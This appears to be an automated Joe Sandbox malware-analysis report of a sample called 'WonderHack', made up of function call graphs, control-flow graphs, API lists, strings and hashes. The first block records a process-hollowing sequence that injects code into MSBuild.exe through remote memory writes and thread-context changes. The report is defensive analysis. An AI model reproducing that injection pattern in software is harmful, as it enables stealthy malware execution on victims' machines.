21738->21740 21745 c92270 21740->21745 21742 ca1430 70 API calls 21742->21744 21743 c92590 21743->21735 21743->21737 21839 ca1430 21743->21839 21744->21735 21744->21742 21940 c92820 21745->21940 21748 c92870 40 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21748->21697 21750 ca230b 21749->21750 21751 ca230c IsProcessorFeaturePresent 21749->21751 21750->21699 21753 ca6086 21751->21753 22016 ca616c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21753->22016 21755 ca6169 21755->21699 21765 c9aa60 21756->21765 21760 c9a962 21781 c9aaf0 21760->21781 21762 c9a978 21763 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21762->21763 21764 c91c52 21763->21764 21764->21729 21787 ca1280 21765->21787 21768 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21769 c9a94d 21768->21769 21770 c9a9d0 21769->21770 21771 c9aa2b 21770->21771 21772 c9a9eb 21770->21772 21774 ca228f codecvt 16 API calls 21771->21774 21772->21771 21773 c9a9fc 21772->21773 21796 ca228f 21773->21796 21775 c9aa3c 21774->21775 21809 c9abc0 135 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21775->21809 21778 c9aa1d 21778->21760 21782 c9ab04 21781->21782 21783 c9ab18 21782->21783 21822 c92b40 40 API calls Concurrency::cancel_current_task 21782->21822 21785 c9ab31 21783->21785 21823 c92b40 40 API calls Concurrency::cancel_current_task 21783->21823 21785->21762 21792 ca12d0 21787->21792 21790 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21791 c9aa8d 21790->21791 21791->21768 21793 ca12f9 21792->21793 21794 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21793->21794 21795 ca12b0 21794->21795 21795->21790 21799 ca2294 21796->21799 21798 c9aa0d 21808 c9ab80 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21798->21808 21799->21798 21801 ca22b0 21799->21801 21810 cb0ccc 21799->21810 21817 caccef EnterCriticalSection LeaveCriticalSection codecvt 21799->21817 21802 ca5f77 codecvt 21801->21802 21803 ca22ba Concurrency::cancel_current_task 21801->21803 21819 ca7223 RaiseException 21802->21819 21818 ca7223 RaiseException 21803->21818 21805 ca5f93 21807 ca2dd9 21808->21778 21809->21778 21815 cb31c1 __strnicoll 21810->21815 21811 cb31ff 21821 caeb64 14 API calls __strnicoll 21811->21821 21812 cb31ea RtlAllocateHeap 21814 cb31fd 21812->21814 21812->21815 21814->21799 21815->21811 21815->21812 21820 caccef EnterCriticalSection LeaveCriticalSection codecvt 21815->21820 21817->21799 21818->21807 21819->21805 21820->21815 21821->21814 21825 c94810 21824->21825 21827 c9482d 21825->21827 21843 c94c90 21825->21843 21827->21743 21853 ca50c2 21828->21853 21832 c94b95 21831->21832 21920 c99760 21832->21920 21835 c94bc0 21837 c94bd4 21835->21837 21836 c94bef 21836->21736 21837->21836 21939 c9a580 40 API calls 21837->21939 21840 ca1448 21839->21840 21841 ca1454 21840->21841 21842 ca4cf2 70 API calls 21840->21842 21841->21743 21842->21841 21844 c94cb8 21843->21844 21845 c94d39 21844->21845 21846 c947f0 40 API calls 21844->21846 21847 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21845->21847 21849 c94cd3 21846->21849 21848 c94d43 21847->21848 21848->21827 21851 c94b70 40 API calls 21849->21851 21852 c94ce6 21849->21852 21850 c94bc0 40 API calls 21850->21845 21851->21852 21852->21850 21856 ca4b30 21853->21856 21857 ca1531 21856->21857 21858 ca4b56 codecvt 21856->21858 21857->21744 21858->21857 21860 ca4cf2 21858->21860 21863 ca4d20 21860->21863 21868 ca4d19 21860->21868 21861 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21862 ca4e1e 21861->21862 21862->21858 21865 ca4dd2 21863->21865 21866 ca4d6b 21863->21866 21863->21868 21865->21868 21872 cb088d 69 API calls _Fputc 21865->21872 21866->21868 21869 ca4915 21866->21869 21868->21861 21873 cb01f7 21869->21873 21871 ca4923 21871->21868 21872->21868 21874 cb020a _Fputc 21873->21874 21877 cb0399 21874->21877 21876 cb0219 _Fputc 21876->21871 21878 cb03a5 ___scrt_is_nonwritable_in_current_image 21877->21878 21879 cb03ac 21878->21879 21880 cb03d1 21878->21880 21918 caf3f8 29 API calls 2 library calls 21879->21918 21888 ca9ee4 EnterCriticalSection 21880->21888 21883 cb03c7 21883->21876 21884 cb03e0 21889 cb022d 21884->21889 21888->21884 21890 cb0252 21889->21890 21891 cb0264 21889->21891 21892 cb0365 _Fputc 66 API calls 21890->21892 21893 cb68c0 __fread_nolock 29 API calls 21891->21893 21904 cb025c 21892->21904 21894 cb026b 21893->21894 21895 cb68c0 __fread_nolock 29 API calls 21894->21895 21900 cb0293 21894->21900 21897 cb027c 21895->21897 21896 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21898 cb0363 21896->21898 21897->21900 21902 cb68c0 __fread_nolock 29 API calls 21897->21902 21919 cb0421 LeaveCriticalSection __fread_nolock 21898->21919 21899 cb0349 21901 cb0365 _Fputc 66 API calls 21899->21901 21900->21899 21903 cb68c0 __fread_nolock 29 API calls 21900->21903 21901->21904 21905 cb0288 21902->21905 21906 cb02c6 21903->21906 21904->21896 21907 cb68c0 __fread_nolock 29 API calls 21905->21907 21908 cb68c0 __fread_nolock 29 API calls 21906->21908 21917 cb02e9 21906->21917 21907->21900 21910 cb02d2 21908->21910 21909 cb0301 21911 cb65ec _Fputc 41 API calls 21909->21911 21912 cb68c0 __fread_nolock 29 API calls 21910->21912 21910->21917 21913 cb0313 21911->21913 21914 cb02de 21912->21914 21913->21904 21916 cb0096 _Fputc 66 API calls 21913->21916 21915 cb68c0 __fread_nolock 29 API calls 21914->21915 21915->21917 21916->21913 21917->21899 21917->21909 21918->21883 21919->21883 21923 c997b0 21920->21923 21924 c9989c 21923->21924 21925 c997f4 21923->21925 21926 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21924->21926 21930 c99814 21925->21930 21935 ca7223 RaiseException 21925->21935 21927 c927f3 21926->21927 21927->21835 21936 c998b0 38 API calls std::ios_base::_Init 21930->21936 21931 c9986f 21937 c998f0 31 API calls 2 library calls 21931->21937 21933 c99884 21938 ca7223 RaiseException 21933->21938 21935->21930 21936->21931 21937->21933 21938->21924 21939->21836 21947 ca1680 21940->21947 21945 c94c90 40 API calls 21946 c91c7a 21945->21946 21946->21748 21948 ca16a4 21947->21948 21964 ca16f0 21948->21964 21950 ca16b2 std::ios_base::_Ios_base_dtor 21951 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21950->21951 21952 c92848 21951->21952 21953 ca1580 21952->21953 21954 c947f0 40 API calls 21953->21954 21955 ca15af 21954->21955 21958 ca1430 70 API calls 21955->21958 21963 ca15c2 21955->21963 21956 c94b70 40 API calls 21957 ca1652 21956->21957 21959 c94bc0 40 API calls 21957->21959 21958->21963 21960 ca165d 21959->21960 21961 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21960->21961 21962 c92859 21961->21962 21962->21945 21963->21956 21983 ca2616 21964->21983 21968 ca172a 21969 ca1755 21968->21969 22004 ca1830 68 API calls 2 library calls 21968->22004 21997 ca2647 21969->21997 21972 ca17e0 21973 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21972->21973 21976 ca17ea 21973->21976 21974 ca1772 21975 ca1780 21974->21975 22005 c94f60 RaiseException Concurrency::cancel_current_task 21974->22005 22006 c94f90 21975->22006 21976->21950 21981 ca17a2 22011 c94fe0 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21981->22011 21984 ca262c 21983->21984 21985 ca2625 21983->21985 21987 ca1714 21984->21987 22013 ca6708 EnterCriticalSection 21984->22013 22012 caf575 6 API calls 2 library calls 21985->22012 21989 c94d90 21987->21989 21990 c94dee 21989->21990 21991 c94db2 21989->21991 21993 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21990->21993 21992 ca2616 std::_Lockit::_Lockit 7 API calls 21991->21992 21994 c94dc3 21992->21994 21995 c94e00 21993->21995 21996 ca2647 std::_Lockit::~_Lockit 2 API calls 21994->21996 21995->21968 21996->21990 21998 caf583 21997->21998 21999 ca2651 21997->21999 22015 caf55e LeaveCriticalSection 21998->22015 22000 ca2664 21999->22000 22014 ca6716 LeaveCriticalSection 21999->22014 22000->21972 22003 caf58a 22003->21972 22004->21974 22007 c94fc0 22006->22007 22008 ca2303 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 22007->22008 22009 c94fcd 22008->22009 22010 ca26f8 16 API calls 2 library calls 22009->22010 22010->21981 22011->21969 22012->21987 22013->21987 22014->22000 22015->22003 22016->21755 22018 cacb47 22017->22018 22019 cacb35 22017->22019 22029 cacca2 22018->22029 22044 ca64d5 GetModuleHandleW 22019->22044 22023 cacb3a 22023->22018 22045 caca3c GetModuleHandleExW 22023->22045 22024 cac9ce 22024->21655 22028 cacb99 22030 caccae ___scrt_is_nonwritable_in_current_image 22029->22030 22051 caf547 EnterCriticalSection 22030->22051 22032 caccb8 22052 cacb9f 22032->22052 22034 caccc5 22056 cacce3 22034->22056 22037 cacad7 22061 cacabe 22037->22061 22039 cacae1 22040 cacaf5 22039->22040 22041 cacae5 GetCurrentProcess TerminateProcess 22039->22041 22042 caca3c CallUnexpected 3 API calls 22040->22042 22041->22040 22043 cacafd ExitProcess 22042->22043 22044->22023 22046 caca7b GetProcAddress 22045->22046 22047 caca9c 22045->22047 22046->22047 22048 caca8f 22046->22048 22049 cacaab 22047->22049 22050 cacaa2 FreeLibrary 22047->22050 22048->22047 22049->22018 22050->22049 22051->22032 22053 cacbab ___scrt_is_nonwritable_in_current_image CallUnexpected 22052->22053 22055 cacc0f CallUnexpected 22053->22055 22059 cae86e 14 API calls 3 library calls 22053->22059 22055->22034 22060 caf55e LeaveCriticalSection 22056->22060 22058 cacb7e 22058->22024 22058->22037 22059->22055 22060->22058 22064 cb68fc 22061->22064 22063 cacac3 CallUnexpected 22063->22039 22065 cb690b CallUnexpected 22064->22065 22066 cb6918 22065->22066 22068 cb4077 22065->22068 22066->22063 22071 cb41c4 22068->22071 22072 cb41f4 22071->22072 22075 cb4093 22071->22075 22072->22075 22078 cb40f9 22072->22078 22075->22066 22076 cb420e GetProcAddress 22076->22075 22077 cb421e std::_Locinfo::_Locinfo_dtor 22076->22077 22077->22075 22084 cb410a ___vcrt_FlsSetValue 22078->22084 22079 cb41a0 22079->22075 22079->22076 22080 cb4128 LoadLibraryExW 22081 cb4143 GetLastError 22080->22081 22082 cb41a7 22080->22082 22081->22084 22082->22079 22083 cb41b9 FreeLibrary 22082->22083 22083->22079 22084->22079 22084->22080 22085 cb4176 LoadLibraryExW 22084->22085 22085->22082 22085->22084 22436 c9af30 50 API calls 22438 cb4b37 15 API calls 22336 ca2934 16 API calls 2 library calls

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00CCF110,00CCF100), ref: 00CCF334
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00CCF347
                                                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00CCF365
                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(0000008C,?,00CCF154,00000004,00000000), ref: 00CCF389
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 00CCF3B4
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 00CCF40C
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 00CCF457
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 00CCF495
                                                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(00000094,01320000), ref: 00CCF4D1
                                                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(00000094), ref: 00CCF4E0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                          • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                          • Instruction ID: 60c01acf7334d6dbccf07252e0dbd644d1a8ba4fcbf3070932fc1f88295289c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEB1F97660064AAFDB60CF58CC80FDA73A5FF88714F158168EA18AB341D774FA52CB94

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 26 cb40f9-cb4105 27 cb4197-cb419a 26->27 28 cb410a-cb411b 27->28 29 cb41a0 27->29 31 cb4128-cb4141 LoadLibraryExW 28->31 32 cb411d-cb4120 28->32 30 cb41a2-cb41a6 29->30 35 cb4143-cb414c GetLastError 31->35 36 cb41a7-cb41b7 31->36 33 cb41c0-cb41c2 32->33 34 cb4126 32->34 33->30 38 cb4194 34->38 39 cb414e-cb4160 call cb76c1 35->39 40 cb4185-cb4192 35->40 36->33 37 cb41b9-cb41ba FreeLibrary 36->37 37->33 38->27 39->40 43 cb4162-cb4174 call cb76c1 39->43 40->38 43->40 46 cb4176-cb4183 LoadLibraryExW 43->46 46->36 46->40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,0BDF5ED4,?,00CB4208,00C93E32,?,00000000,?), ref: 00CB41BA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: 26c1a4c0f3027a30b2203c62a0b8baefb936c1634631ecc20d065465bd8806d3
                                                                                                                                                                                                                                                                          • Instruction ID: e28c7acc859043e82cf6c20a4b612acca1b0639de4cf22b53c8a2067914b7a76
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c1a4c0f3027a30b2203c62a0b8baefb936c1634631ecc20d065465bd8806d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A21E736E05211ABD7259B69DC44FDE3768DF617A0F240221F926A7292E730EF41C6E0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff2df82defd979c00d4827294a6fb9d668e3f65475ca4c3da52d3939b6f7d968
                                                                                                                                                                                                                                                                          • Instruction ID: a17e3361f0eebdef3af01126ff273547aec2ff77126b8c305540c6c81ef59345
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2df82defd979c00d4827294a6fb9d668e3f65475ca4c3da52d3939b6f7d968
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F71C0B4D05249CFDB00EFA8D58979DBBF0BF08304F14842AE899AB390D734A945DF52

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 81 c98730-c98795 82 c9879b-c987ac 81->82 83 c987d0-c987f3 call c96a80 81->83 84 c987b2-c987be 82->84 85 c987c4-c987ca 82->85 88 c987f9-c98805 83->88 89 c9880a-c98822 83->89 84->85 85->83 90 c98880-c989c0 call cb1170 call cb0ca4 call cb1170 call c949d0 call c96aa0 call c94a00 call c96bb0 call c96c50 call c96c10 call c949d0 call c96c70 call c94a00 call c96d80 call c96db0 88->90 91 c98828-c98838 89->91 92 c9887b 89->92 124 c989f3-c989fa 90->124 125 c989c6-c989f1 call c992f0 call c96c50 90->125 91->92 93 c9883e-c9884f 91->93 92->90 95 c9886c-c98875 93->95 96 c98855-c98866 93->96 95->92 96->92 96->95 127 c98b21-c98b3a call c91dc0 call c96ee0 124->127 128 c98a00-c98a09 124->128 125->124 142 c98b40-c98b50 call c96ee0 127->142 143 c98b56-c98b60 127->143 129 c98a0f-c98a1b 128->129 130 c98a20-c98a26 128->130 133 c98a2c-c98a4c call c96c50 129->133 130->133 141 c98a52-c98a66 133->141 144 c98a6c-c98a81 141->144 145 c98aa7-c98aaf 141->145 142->143 159 c98b65-c98b70 call c96ee0 142->159 147 c98b76-c98b90 call c96a80 143->147 144->145 148 c98a87-c98aa1 144->148 150 c98aba-c98b02 call c96dd0 145->150 151 c98ab5-c98b1c 145->151 157 c98c81-c98c8b 147->157 158 c98b96-c98ba0 147->158 148->145 165 c98b08-c98b11 150->165 166 c98b17 150->166 151->127 162 c98d7e-c98e04 call c96c50 call c96f80 157->162 163 c98c91-c98d79 call c96c50 call c96f80 call c96f00 157->163 158->157 161 c98ba6-c98c7c call c96f00 call c96c50 call c96f80 158->161 159->147 183 c98e0c-c98e82 call c96c50 call c96f80 161->183 180 c98e07 162->180 163->180 165->166 166->141 180->183 189 c98e87-c98f2c call c97010 call c96f00 call c91e70 * 2 call ca2303 183->189
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strcspn
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: d1aafd0dfb41862d66d9eb0839fdcaa209f96a213a209573a15a3627c0592fe5
                                                                                                                                                                                                                                                                          • Instruction ID: 9b4531097932b68ca07d869a9af3f383784a0ab4bc1ea743a0fa9b2a0f305710
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1aafd0dfb41862d66d9eb0839fdcaa209f96a213a209573a15a3627c0592fe5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F932E2B4904269CFCB24DF64C985B9DBBF1BF49300F0585AAE889A7341D730AE85DF91

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleFreeProtectVirtual
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 621788221-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: ebac94ed2751e3d9e19c8277d8e0b77012f9df2ab979ca86fa3223fc368467d2
                                                                                                                                                                                                                                                                          • Instruction ID: edc25fba559f289bffe5deee0df9afc1bc69aaf4de3e81e145e7a0ffd77c6118
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebac94ed2751e3d9e19c8277d8e0b77012f9df2ab979ca86fa3223fc368467d2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41E2B0D012099FCB04DFA9E48979EBBF0EF48314F15841AE858AB351D774A945CF95

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00CAC9E4,?,00CACB99,00000000,?,?,00CAC9E4,0BDF5ED4,?,00CAC9E4), ref: 00CACAE8
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00CACB99,00000000,?,?,00CAC9E4,0BDF5ED4,?,00CAC9E4), ref: 00CACAEF
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00CACB01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
